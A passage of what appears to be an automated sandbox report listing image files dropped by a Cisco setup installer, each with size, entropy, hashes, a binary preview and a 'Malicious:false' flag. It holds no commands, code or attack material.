                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:h6QRIHYm77Z5IVpIHwuS0g72HR1K9TEYkbGg2o:iHY0TUuUSHRAQXHx
                                                                                                                                                                                                  MD5:E61CF737A35E8DB52178528A0CBFE702
                                                                                                                                                                                                  SHA1:DE0A794D67A3DEF7079CEC7C48AC580CC71A7270
                                                                                                                                                                                                  SHA-256:559C518DC1F316C4991DC95D131CAB0BDAC445B1CE41B28EC8244CDD78F8AB2F
                                                                                                                                                                                                  SHA-512:8563013E9A2B75F5EDF00D71A292634FE375D5F6670F7F303C2CAB2DC271FDFC04A760417E2D487269D26611F6D236E6164EFC3179452AB34B1D42ABC17C51B6
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:...... .... .....&......... .h.......(... ...@..... ............................................................................P...........................@.......................................................................................`...................................................@...................................................................@................z]J.X5..M'..M'..M'..M'..X5...kY....................0.................................................................xh.M'..M'..M'..M'..M'..M'..M'..M'..M'..M'..M'..X5.................p........................................................X5..M'..M'..z]J.................................X5..M'..M'..X5...........................................................xh.M'..M'..z]J.............................................M'..M'..M'..M'...................................................xh.M'..M'......................................................M'..M'..z]J.M'..M'.............p.......................P........M'..M'
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 16 x 12, 8-bit colormap, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):3884
                                                                                                                                                                                                  Entropy (8bit):6.749338244156901
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:ildHE8+JjpMNNa3OjboViS4nXsAYdPd3F58ZpiU54SN775OBQgJLkXf:iXHt+JcNgOSiS4XsAYNpf2ESNtg1kXf
                                                                                                                                                                                                  MD5:ECBD0E4A17836F184F084BF3D9170141
                                                                                                                                                                                                  SHA1:45E135215179398684C1D52BB8430D827577500D
                                                                                                                                                                                                  SHA-256:5734B02A7A809DC54D75C00E7137CE9F2BF85CE8050B6105016FEE5D5E1BA44B
                                                                                                                                                                                                  SHA-512:5EB8B7519E6F9EE518812B3F0D8DF3C3E6A73A899E70F853848C69551B783663111B62900837CF0F02098A7452EE3D8638839658B3724990BFA5C2BF148B8D05
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR.............\9.....gAMA....|.Q.... cHRM...........R...@..}y.....<.....s<.w...9iCCPPhotoshop ICC profile..H..wTT....wz..0.R.....{.^Ea..`(..34.!...ED."HP..P$VD...T..$.(1.ET,oF.........o......Z..../...K......<....Qt.....`.).LVF._.{......!r._...zX..p..3.N....Y.|......9.,...8%K.......,f.%f.(A..9a..>.,....<...9..S.b...L!G....3..,....F.0.+.7..T.3...Il.pX."6.1...."....H._q.W,.d..rIK..s...t......A..d.p....&+..g.].R.......Y2...EE.4...4432..P.u.oJ..Ez...g.........`.j..-....-....b.8....o....M</..A...qVV....2.....O.....g$>...]9.La.....+-%M.g.3Y.......u..A.x....E.....K.......i<:...............Pc...u*@~..(.. ...]..o..0 ~y.*..s..7.g...%...9.%(....3........H.*...@...C`...-p.n.......V..H.....@....A1....jP..A3h..A'8..K....n..`.L.g`......a!2D..!.H... .d..A.P....B....By.f..*...z....:....@..]h...~....L.............C.Up.......p%....;...5.6<.?.........."....G..x...G.....iE..>.&2.. oQ...EG..lQ..P......U..F.Fu.zQ7Qc.Y.G4....G......t...].nB../.o.'.1.......xb"1I.
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 3563 x 1383, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):83426
                                                                                                                                                                                                  Entropy (8bit):7.358868361468608
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:dixvvTkILgVLxXyJl/WOwiu/PK7KT+vWJv1RASI/sH4PIfeN9Oo:avvTfg5Fyv/WOwiurQWJ9e0H4PoeTOo
                                                                                                                                                                                                  MD5:4AC53A86840972B2C8E661710290F3ED
                                                                                                                                                                                                  SHA1:D305EC46D2A933DA35D0634B1C23B2657A70CA88
                                                                                                                                                                                                  SHA-256:647EFCB4DF9273570A803D5818A37814601B06D41D77A51B61461B12958F028C
                                                                                                                                                                                                  SHA-512:86CCC7CA3A4EC721DB91B498E05C4DED79B3BF88E3AF5BCA4198380742B79C69AFF7BCDE7CE15FC09D1C976C37E56298EC3BECAD9254242ACCFAD9CBD6159BA4
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR.......g........@....pHYs...#...#.x.?v.. .IDATx...Mr....N*+.*....O....OeM..W..;Hy.^...Wt..M..$....r]_Gj.A.................................................p.....?.=....._......\..?....|;......T.T*..=S.....i.[.........@.T|......SQ..p**>.N...l.e..>/.2...\.f.."../.2.....i..@atu..\.............Tv..R.........W;....[.....^;..}.O..+....C.7.@:Y..#O....LE..>....x..B-....LE..?..z..Yk.s.g.|.1/.>....}.5..<a...Y..Z..J).......}.....W|.|...!..f*>&.j..f..z-...9..Q.R#c|..m..ww.N....F.E|.......?...?w.p.t....B+...}g...G.1....F...2.........v.M.........]...E..%.us........B...9G.K*.._..5F@.<?....C.E8.-.\[.c.....=.i..PZ53p......<...o.;..O7..w..T....X...\..k....{.....Dv..Y.1..MI.......R......#....0..S.%T|.3..5....|..Q....46.....6ml<..^_.2....k.SJ.>O...A....U...g.\.F.*#j.m.7u......-!.p.4..........!...[..Rh.?......F..5.C....S.W..B~7...0..|.|.*...J.Ze...P...H].u.6....p......P.:i.F.g..$GE...*...ch.3q......J`.wo.,..^......efy.a....s.i.P.l*...
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 200 x 200, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):10710
                                                                                                                                                                                                  Entropy (8bit):7.9641316394298025
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:Aowo3FbryCXdxyG2En+b5eUJf1Q6pPZ3LxElBt/wVUuv04YKmECa:AowqbrvX3h1+b5eMdQDY3v0da
                                                                                                                                                                                                  MD5:5412237E7D26A5CB2F3F8891B9E36462
                                                                                                                                                                                                  SHA1:778ABA750AFD4D5518A5B7EDE1F73E7A016883C8
                                                                                                                                                                                                  SHA-256:288C513CA8875B4BC5DB6144D0C4215680F5BF3385DF05D6A8EC2896587DB6D3
                                                                                                                                                                                                  SHA-512:BAC0482951830571BDAF8A1FF0C23B3EB1C6AFB72C46628150EAEE2CD99167FEBE9A74DCAA2F2DAEDA5B58856BA7A9378880A7EB0B5D834D31EA91D3010B41F8
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR.............._......pHYs...#...#.x.?v.. .IDATx..]{..U._<..Th.CK=..R..V.GOWH.G3"8.5L.....;b............3.:S....s=....G].vX.w....W....Z?.^{..k..{.........w}...%y`...]...B6..........K.S..j.G."..?>.c..~../(/&}................p..B~..7...t.\... .j......,.......;.]M......`.o.p..?...98.c.%.6.....g...&.............;..F..!.fL%/.j@:.`.o....5_.b2...5|h...UoI/....W..W...}.....<.<\0.p.N.,Y......M...KI.O"C.x.}$.....=.V...E.........HT....Ep.m.~.[(....Y.f.'g*_...NG..S....m.2.<..[.(G.m..[.1....S........|...[.o.#eW....F.-.a.+...^.Rp...L.ue.<+./.......?..Lke.b.r.....V..G...$..6.]:.s...+..F...#O....=Y.;..g..l..,c....DWw.hB....B..l...`..;".wV.#..{.q.........v.].Z..C...T.`.-}M#...........{.(t.E.Om. ..=My..V...4.\.Ep.........W.)..x.W..f..7{.IG..-.....Z..{.l..F.,..f^r...V.9..H../.....$.&>..U...Msx.68.....S{...Z....v..v....O,.ps2E.......>..M_.........6H.hl.;Q.d....h.H...V..W...iH..{..2Q.zmp..;.Z~].c.!.Y.}.6.P......^kC..t...V.0.^.l.NMp..o..Y.8...Q
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 16 x 12, 8-bit colormap, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):3881
                                                                                                                                                                                                  Entropy (8bit):6.749191813135782
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:ildHE8+JjpMNNa3OjboViS4nXsAYdPd3F58ZpiU54SN775OBQgI+P:iXHt+JcNgOSiS4XsAYNpf2ESNtgB
                                                                                                                                                                                                  MD5:C09256A999756AFFAE49A6E4346D910C
                                                                                                                                                                                                  SHA1:95158F9717019700B626D2A675F17C50853E436E
                                                                                                                                                                                                  SHA-256:D2913B404D604DD9F61952E0539DA5FCD742FC7E87F30CCC4263303DEC5F43B0
                                                                                                                                                                                                  SHA-512:D2DD40D4A8FBFEC4DFB2EF285880F103CB50D0AB461731915C15D8A4061E77C70513658419FF72925D90741FBD75079899E5293A107B7361B2142358534C94EA
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR.............\9.....gAMA....|.Q.... cHRM...........R...@..}y.....<.....s<.w...9iCCPPhotoshop ICC profile..H..wTT....wz..0.R.....{.^Ea..`(..34.!...ED."HP..P$VD...T..$.(1.ET,oF.........o......Z..../...K......<....Qt.....`.).LVF._.{......!r._...zX..p..3.N....Y.|......9.,...8%K.......,f.%f.(A..9a..>.,....<...9..S.b...L!G....3..,....F.0.+.7..T.3...Il.pX."6.1...."....H._q.W,.d..rIK..s...t......A..d.p....&+..g.].R.......Y2...EE.4...4432..P.u.oJ..Ez...g.........`.j..-....-....b.8....o....M</..A...qVV....2.....O.....g$>...]9.La.....+-%M.g.3Y.......u..A.x....E.....K.......i<:...............Pc...u*@~..(.. ...]..o..0 ~y.*..s..7.g...%...9.%(....3........H.*...@...C`...-p.n.......V..H.....@....A1....jP..A3h..A'8..K....n..`.L.g`......a!2D..!.H... .d..A.P....B....By.f..*...z....:....@..]h...~....L.............C.Up.......p%....;...5.6<.?.........."....G..x...G.....iE..>.&2.. oQ...EG..lQ..P......U..F.Fu.zQ7Qc.Y.G4....G......t...].nB../.o.'.1.......xb"1I.
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 24 x 22, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):291
                                                                                                                                                                                                  Entropy (8bit):6.344520469543007
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6:6v/lhPqJsXTSgECFg9ZA3teRaCCgqMtK+ywsl3DF1bp:6v/7hXeBOgIYawtvyx3/1
                                                                                                                                                                                                  MD5:DA395D5499E3403BC29899F8ED09E0F4
                                                                                                                                                                                                  SHA1:A6806BF5F7B2B0E1DDB705E2DBDF761E704738CD
                                                                                                                                                                                                  SHA-256:E72F87D5171DCD847C6A5994471B97339C4595E0C55591B1641227B56DB02041
                                                                                                                                                                                                  SHA-512:FEF71C2D806F506CD67B3338484C0B100989135012E72B321287C662AD65BD9120B210270D0B023F76FCAFD23237E9EDEDD5987E6B4D3731B9776B2EB338FE18
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR..............}\.....gAMA......a.....pHYs...........~.....tIME........w.e....tEXtComment.Created with GIMPW.......tEXtSoftware.Paint.NET v3.5.100.r....gIDATHKc`...!@........0.a|Rh..r....0E0>)4.}=..t.....0W....x}......a.`|R...dTw..........B.u..-.z...8.C..^...Y.......IEND.B`.
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):5803
                                                                                                                                                                                                  Entropy (8bit):7.950077949239442
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:eRHNludLinPdADSlBP/5X48lHE6uXPk1HFlQ0vmHSQON0hYRGRkA3rGWjrXM:UHNludLjM/FvhE8FlRRJG1r5jA
                                                                                                                                                                                                  MD5:1F00D2A16D3C303C76359276E6983553
                                                                                                                                                                                                  SHA1:9B58E65D2A01B1E55173370BBED7CFFB72C683D2
                                                                                                                                                                                                  SHA-256:F70F49DED3EB450D26AABC8F71AE8C1BF63D2C01A1C55C6A19E010FAD602011E
                                                                                                                                                                                                  SHA-512:C65A78144AB84A68DEFAB93704D20AB177E2BB82138FCD47171289D164F938D7D9620AEB22ABE234CDC79DE2CB28AF1A2B780845D873409DF0B89A60C34D425F
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR..............>a.....pHYs...........~....]IDATx..]{l[.y..."-?r...:.e'K..).9.R...%h.......0..m.?.y[.a. ...x.C.6t.......N.u3.......FJ.d..Dt.%.._.%>..;<7.)..;..R...@K...=.|..}.|..h..6.h.....U2.(......c.g...<..c.1@L..[....D"....F.4..3..MM.h.N.....9-..U..e.... .."...Ad.....>*'..lF......d.0.8....4E+..O..i.V<.....5==m5.x..w.......8^.b<JD.H.....&''.Fp'./....>.6.z...MO....T*.2D....}E.e...6. .I.z....fffZ..u.>...DL.1....acW.0.2....U.{.........W.c..!%W0W=. .......U.*0F.U...e....B..b.......c.Z...JW.\.... D.#.....h4.H...W.5F.w..;'~..o."...%..l.....|.#.w.......~"....H.^V.f2.f.x<.7GGGk..u."....?...1....}.3.......d2..L.|C...k...>.wo9.b/.p.r.. k....r`.2).m.u.8.*3$.I.....$=..@3. a.f<.J...A...E./$.8.4MY....u.Sh.#.1..,A..?.BR2.g....h4.......2......S4.2..S&....!.....B.J........d..........n.}w.0..]...t.5.x............Z.s_B.Y....f...?..A!..!.&#.&...|C!GV>K..z.jh.U_..x..n2@.4............0J../...Y.sD..I7.7F.........kKD..@l....">.. .g..K|..|./.1...&@.A.
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 101 x 101, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1856
                                                                                                                                                                                                  Entropy (8bit):7.845521158056495
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:M5K2A2T3d0z5uOpdNSaQfbDS3YsPWaU3SjmUjm42rh:Mg2A9z5Fp1W3otPW5p
                                                                                                                                                                                                  MD5:AFAF04A11862845AFC31D64F7762D28E
                                                                                                                                                                                                  SHA1:C5E99C3DC321086738CB7BCF13EFF55EBDF1D3CF
                                                                                                                                                                                                  SHA-256:6797601AA69F2B489ADAB85A6DA73E78D4E041D24598BC726A3E837D2BE2D75E
                                                                                                                                                                                                  SHA-512:3D463D3EA19E87E8B592974BF4B69F4F6F5DE08975BB04AB0C180AE7CC49C9866E7B40F2D5890E50E7BF0FE2F8830125335FECB7C4FED8F2AF6045F8E66E18B4
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR...e...e.....T|-.....pHYs...#...#.x.?v....IDATx..r.F...I.t..X..*.&T..P.JT.*...d.)0..@.....I.T...~..L.9...".....s.7..{D..|..?w.D".H$..D"......$...h..{*...#..C..6dDt...0..]..6.v.<.,.....8E.k...$.h..j)..s...C.XE.r]5\..E|..].bDY.....Rl...\X..p]WMt.,..Q..O...Oe...........\..b...1.|BY.f.r.d.5.]..#e..h.u]5.y%...DtGD....q_Z.m.Vi.+*......5....{G.^~'..-.8..Xx...xK.-...[.a...2_wa...%....E..!...m1XKi.d...r...o.v.>.SIeq..)m....AH.....^.F.?.....w...?.s.G.......^r...G.(.viDh.X....O.>..+..5@....9....+..]W......m.emb!...../....W..WS?8d.E.<.Q...S...!.!#.R.u5........4..Qn.F*.G[.PYQY@...D........|..,.*.am....h..k..e"0'....IQJ..@N..7...&^.Y.S..........Q[o..../|j":.xnb._q...{^c'..Lz..!(.t..t..k.X...n..+................xLkzz....W..RVr.....Q.wy.T.........]... $n)d..#..........%..}.Hx..q..,T7..F..v....=7p..$(....].S.....D......=...m.B.......ML ..%...X...U.*...e..H..EM.?......].....D...o.).M...W.P.h......=..#..4...Z..0Yn.E..?...K ;K.$..n..Zq-A..
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 201 x 200, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):9482
                                                                                                                                                                                                  Entropy (8bit):7.969513879342907
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:LXNXFLy+vMbgQbCoVANBzT84c2blwwjla7:rNX5ggQOoVIzwHwxA
                                                                                                                                                                                                  MD5:21841588532E34397E478E791A064F2C
                                                                                                                                                                                                  SHA1:90C0BEAC3D3A1288FB7BED658835BB6710E67922
                                                                                                                                                                                                  SHA-256:9D0F626E21D3324BE7CB473D44514737D9A9145B86E73F67EBFD6DE308B36FCC
                                                                                                                                                                                                  SHA-512:B0006DD98C201AD06F79166FD53F67C61C60C48C1506153EA47AB7F38A7D4F6CCACDF9E369AC0EFAD36B396786EDFD1FBEF8302D1F2B1F82BE6D784936ED6CB0
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR.............5..6....pHYs...#...#.x.?v.. .IDATx..ml]......$..B.^..R.BI.mPB..i..B.I.D*.B...i...b7M...B...TI.CU..K..*.6%.\.5...T.....B.iU....U...x.d..y=g.9...dp..{.s.y^.y!e.1....z..BN...........[.~..X......Q.PO.w.!......k.d.M........x....y....<....O.oe.o."<...d..f.&2..".....(..{..}..C....]y..).xq.]...7....M....{......:'..'^.......9..0.._..~....#3.^M.t.0.....................\v].3.b.....ONz{.._..........m_..\..5W.buE...q..>...xE.+qA{E>^._.....f(...p5..s.fgI............_.z./.+V.>N.....D..). .q..9..!..9#..-(...^...G...].E.l.>..2...o..t/"C...x.\........u/ S|R..)-WMK..1..\..{..&..w..V.^...U8_A(l...Jp.....y.#..b{5:...F0-..N.c..ne..5....&.Kf(j7O....../0..N.[K.#Q|.K..cfjb;..N.....8.{....n#.j.O...Z._;.m.jWfp~.............. .w.}.<....\1X?+..4bi]..H)../.".....f.&N^......8..S..]...3..Cn..z]l.,........_...ek.e.F.-w?....i..i.B&./..........>.|r...Ii!....Q...t2._..HHCBx..B...<?35.J.....V/..s-...[..k..V.v.a.50..teS..w`fjbm....qC.....;89+!/@.
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 534 x 534, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):26674
                                                                                                                                                                                                  Entropy (8bit):7.935979285003627
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:YFyemvD4Gm3D6kkgmo+C24RkZErZWiTVCbFk:YryD4G+Dcgmo+C9kZsZWpFk
                                                                                                                                                                                                  MD5:B1655EC01B232A1A42E43F950321285A
                                                                                                                                                                                                  SHA1:F34C1F228C66BF4ED1B0E9901D3284EBD7A01600
                                                                                                                                                                                                  SHA-256:9E2447F1B7B4A3404C8D3588DAB59CF51635049BE4F1FC0D1BDEE77DEFFC5B47
                                                                                                                                                                                                  SHA-512:BCC1BC2AE795109EF83422613D9B0D9FF23EA81136479748FFA7CD7FC03D527B4744833728637F7892B5F60DD476F1F32122AECCCC26DB2D6092CD2346A750BA
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR.............|@.E....pHYs...#...#.x.?v.. .IDATx..Oh%G...G........4..TSG.nO....j..CI.s.7%...fa..ofQ*...x;...<^/,y1.a.R...RA/.f!..)...R....\K..]......'Od..........d.tN.<...../.O.9>.............}.P8e.M.:8.'#........z.Z;.)K.,--%..'.?a..GB...[1r..I\2...4?..SKN|`. ..E..n..hz..mll.z".KhG\>.i.2....;.....|\.ywww.......a..{2*..Io~.UO..t*...'ckk....~.....zB*......I.R.T9!.OF...|...e(z#.N....o.P.+eOH...]..~..@..!...=*....'>...+O\.u..Z.yo...{.......2ieX9..(.Br):.k!..I.c.}S.'cccc..F.......0q"l...k....ve.>...p.coRw2r.D.[...}....h>.Q.*B<.......y...{&B.<...{...9.e7`.......w...*\.Mt..EU...h.].....r.G..;y..`.d..C6.Y.z#.f.r2.y.5.W.<.#!..!..[.5.yp;...OFL.Brv.V.uoe..O....aV.2.p2....d.t.C..'..e...Q7-.g...._...3.N<....}D:.`3.....n.^.0..X.VF..f.'.u...W...p}.(Y.#......M?.......r4.|...*...@).GGz/`...U....3............F.C...[.5...;..kv.[...+k3$......N...c......j.B(..Z...k....&...8.._..E..M..(I..u..Td.....R....C.......b....E/X;....#..
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 201 x 201, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):14308
                                                                                                                                                                                                  Entropy (8bit):7.981829207860698
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:XybKkbzXX5gnaVvNX5HqQiVAlwokisiMCb9sdP4++2SC7a1Rj2:XFyBr5KAworb9sB4Yi0
                                                                                                                                                                                                  MD5:1FC5657F3DDBAE57EA997277C9D6488A
                                                                                                                                                                                                  SHA1:2C4A261FEA797112FF95ABDB008435329BC8C048
                                                                                                                                                                                                  SHA-256:DC39DF1AECA15B0BAD3E15D05CE917D3CB7CB00C4F363BE67AC5741F82E5A57A
                                                                                                                                                                                                  SHA-512:CA37C34378244C91AC316717B1DFBA2E3D596918F9000710ECDF503728C2C207031F71224410CE661AADB59DB5272EF993A0826E96D311784F32BDE7BA125440
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR...............&.....pHYs...#...#.x.?v.. .IDATx..}.x....{.......!.}V...U.`...Z..X.....j.j.\*!.V..P..........OM.AhQ.l.[5... .\ ,.{~s..g.=g..v....'..ef..w._J.bn.)(.-$.m....l.....[k..47..G..v....W.5...5.Wz.....'.._6@.$@....>....].g.....=..G......V$;.'..........._6 .$@..WY.U....)q;U+.V].[..qR..a..T.\O...Y....u.v).q.-..d+..]...._s<.X..sJc.TO..v.G.og....Z>T...'.`.[.x;....l....>...e.:.x...|.n.d.=....2.aKt;.....}....W.B/<6%.D*......?q....I..:~..}a.d.`'a....+R.')8..|j.....W.s..w*.|.I.oy:....'aO...txa...w....M.)..!q.S.>g1..+V.{.wL..eO.x.......a...k#.[....^....b.D4.z.....X;..e.d..O.a.D...%...+H....u^.{..vm.....c5.Kl..+.V.....&.n]:KO......l;...Q../.r*.U..........6n.....p.^...4.......1..].i..C..%O.q.W5.4....;..h..].I.B.(....-.ex..:.l.....i.N..qp..=...I_..8.E.I.j...R/.i.1..x.............?.&o......W.57.5..t...E..%D.<..@3N"*..b%8Q.1..1....V.B..8Q.o.....).<...1.T.x.L...h...KdOc..V3..E...Z'9(.<.U'.D.....MY........4...}...R.rL........g
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 200 x 201, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):13633
                                                                                                                                                                                                  Entropy (8bit):7.975971786407776
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:6MOtUX/uOlpyiGD809Mt039VytL65doCQc:1NWFl809Mt0j0Lap
                                                                                                                                                                                                  MD5:9C88E64458F50120E89167040B55A41C
                                                                                                                                                                                                  SHA1:8A43DFC4B9ED2CB460A024562405302468185A09
                                                                                                                                                                                                  SHA-256:E1E3C1C59B21F0F49EC9DB747C14760EC2068394F739A2E456F20A25E40AD24D
                                                                                                                                                                                                  SHA-512:7EACCCFC904D52AA13214757309858F4083F5CD8C06D6442F3C3F361A2AD01865C4A816240F3B87B63052F33AB96EB08F0C504A1CF0110C569D64350948B3BD8
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR...............M.....pHYs...#...#.x.?v.. .IDATx..}.t....*...KT .J.(..U".T.`.*.+.U.D...`.....G....V[.&.....m.*JX7...A.>..G....^4....8..g....=..I.[...9gf.|...c......+\.>..8^E.M=..O....w|.U......'..5G.A...].......h.......7'.....3=9.Uk.Hi..9Q.9o.E.^..F.^.......+I.......8W.E....w..~...&..?.............7..-..FAO.S.......>.A..:.....d.Z.(.=.{Qy!.Fz....q.N.p..+.....\DFp.c...x.y.....u.7.&................kg..{.g.../...EL .......E..-...#.#.....f$g.v"........Igup..E.,b:f..Lv..#/&..oM.l..G..z^Q.<...f.^]{.[.g...q.X...._.....s.d..(0"..<...V.8q....CM..N....yb...{.i....d....Q....c...{.z...x..D.Mi....<'...#c....G..F.......CM).9.*'...n...Y...zz..q..l.;.j.w...!.F..'&........!z\s._.j..u.Q...].k+...(...R'.H..B....(x.R'.H...-.N.8....|_...!.Ks.>9.yf.^@..P.O..../..^..#.j/.......w....c?op.C2q..:...$#=A.n]..i..y.'....tR.D...5...T.DO.#..U...}"|\..S.qH... .H[..<..]..V...u(.0O:2.X. .....>.S\.?.$...Ez.....$..<.. .=..paR.|...8..T....]......./...IY.......O
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 72 x 72, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2002
                                                                                                                                                                                                  Entropy (8bit):7.874049849617631
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:aYtizXuhGfrlz7ES0+AXMzboB3CiWBgvnUeHAG:nkVFNA8Pq39/UegG
                                                                                                                                                                                                  MD5:513D5EA87AFF39BFAC791F6A1AEA44B6
                                                                                                                                                                                                  SHA1:1858020A95D380478119D11C567D686B3097CEC7
                                                                                                                                                                                                  SHA-256:E04B608228DB3AB98917F8B62BB3F64FFBC6E272FFD2B84B2CEB752838FE4485
                                                                                                                                                                                                  SHA-512:2F26AECB0AE3B423B79B4EFDF7CFF8535236E62102F0F4DB9C98A88243B3B1A6EE5CB30F6D049FC3F5E19ABBF22C5DF19805ACB2F7FD3BEB77D7D33AA351E5D5
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR...H...H.....U.G....pHYs...........~.....IDATx..{lSU...vK.nl%.6..... ...0.q#D.?d....C1!j..G.Q0.,A:b.q..5d...L%...H..I@.9..B.G..E.=.SN.n....n.&..]...........A1..Z\BD6"..G.?..AD.~....l?...G...Z.KD.DTAD%.{.V,a....(#=..{..a:........)/.H-Dt..l.f....l-.p(5.;.ge2 E.K.....ro?....9v.9.....r.m...8.-.....JW.....K............\..]OP..R...lz...J...|P..uP.-.*..J3 ...Ui.......OxcK..@...L.Bl..8....{M.b...m.b.1....^.(...UG.M..2[..x..k.[K;.=G.SR5.....Fh{...|..qo..8....PR._0[..&...SR....^..(M.d6.B .Lek...<j;}.r.s..k........q8M........z..5..MkV/..?]J......kw8.B.b..:...qW...U.g^..O.}.|/$@.s..0].r..twR..o.7.....4.J.Gs-6.....C.@..Ho8.s..0u...{..r3.Ri.S.U.B....Vm...Y...9.K}.`..7U..y..I.....j................+..d.p].'.>.O..U.....<....F..X.....9.M..5w....e>@wO[.<C).r.|.Z.....e.....t..>............E].N:xa...,)Y....T4.a.~.U..0.^U8.A..............|Y.....@O...)?)..9.v^...W.#.2-M.:M.@..O.......l....T..L.....,..P.''...E...ZUX@-..P.V&eX.......M*...<.c+.A....K...V.
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):543
                                                                                                                                                                                                  Entropy (8bit):7.547901309478316
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12:6v/7CWdT8JNBxFtHpTJKAghnooED91TFxff+Tye5N3Q2+ah7:KT8rBztJYnCjT3+TN5N1B7
                                                                                                                                                                                                  MD5:5D99349B36EE267BD85E3A4E4C8B9D09
